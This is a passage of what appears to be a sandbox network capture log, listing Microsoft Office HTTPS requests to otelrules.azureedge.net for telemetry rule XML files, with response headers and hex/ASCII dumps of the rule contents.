                                                                                                                                                                            x-azure-ref: 20241028T181231Z-r1755647c66gqcpzhw8q9nhnq000000006600000000055mf
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:31 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            70192.168.2.44982313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:31 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:31 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                            ETag: "0x8DC582B91EAD002"
                                                                                                                                                                            x-ms-request-id: b7beb219-701e-0097-1404-27b8c1000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181231Z-r1755647c666qwwlm3r555dyqc00000005g000000000g04t
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:31 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            71192.168.2.44982413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:31 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:31 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 432
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                            ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                            x-ms-request-id: 6741ff86-f01e-00aa-74b9-268521000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181231Z-r1755647c66hlhp26bqv22ant400000005hg000000009kqd
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:31 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            72192.168.2.44982513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:31 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:31 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                            ETag: "0x8DC582BBA740822"
                                                                                                                                                                            x-ms-request-id: 8e6218f7-d01e-0066-7d57-27ea17000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181231Z-17fbfdc98bbsw6nnfh43fuwvyn00000003k0000000004qqm
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:31 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            73192.168.2.44982613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:31 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:31 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                            ETag: "0x8DC582BB464F255"
                                                                                                                                                                            x-ms-request-id: 48ec36c7-d01e-00a1-338d-2735b1000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181231Z-17fbfdc98bbh7l5skzh3rekksc00000006tg00000000696u
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:31 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            74192.168.2.44982813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:32 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:32 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                            x-ms-request-id: 44c43cee-601e-003e-459c-273248000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181232Z-r1755647c66vkwr5neys93e0h400000004w000000000dqgc
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            75192.168.2.44982713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:32 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:32 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                            ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                            x-ms-request-id: ea5c4bf4-701e-000d-56e3-256de3000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181232Z-r1755647c66bdj57qqnd8h5hp80000000640000000001twh
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:32 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            76192.168.2.44983013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:32 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:32 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 405
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                            ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                            x-ms-request-id: 9577fd14-901e-0016-4fa3-26efe9000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181232Z-17fbfdc98bb2rxf2hfvcfz540000000003a000000000a2r0
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:32 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            77192.168.2.44982913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:32 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:32 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                            ETag: "0x8DC582B984BF177"
                                                                                                                                                                            x-ms-request-id: f46f8e47-e01e-00aa-72c7-20ceda000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181232Z-r1755647c665dwkwce4e7gadz00000000670000000008e88
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            78192.168.2.44983113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:32 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:32 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                            ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                            x-ms-request-id: de1a9787-701e-006f-48ae-26afc4000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181232Z-r1755647c66ljccje5cnds62nc000000043000000000bqnr
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:32 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            79192.168.2.44983313.107.253.454435804C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:33 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:33 UTC584INHTTP/1.1 200 OK
